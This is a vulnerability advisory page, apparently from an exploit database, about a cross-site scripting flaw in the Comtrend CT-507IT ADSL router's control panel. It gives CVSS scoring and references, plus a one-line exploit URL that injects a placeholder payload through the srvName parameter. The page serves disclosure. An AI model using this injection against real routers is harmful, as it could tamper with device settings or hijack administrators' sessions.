cpanel of Comtrend ADSL Router - XSS

2010-02-03 / 2010-02-04
Credit: Yoyahack
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: XSS in cpanel of Comtrend ADSL Router # Date: 23-1-2010 # Author: Yoyahack # Software: Comtrend # Version: CT-507IT /* XSS in the control panel Comtrend ADSL Router */ /* Autor: Yoyahack Site: undersecurity.net<http://undersecurity.net> */ Exploit: http://Serve/scvrtsrv.cmd?action=add&srvName=XSS_HERE&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1,

References:

http://www.securityfocus.com/bid/38004
http://secunia.com/advisories/38309
http://packetstormsecurity.org/1001-exploits/comtrend-xss.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top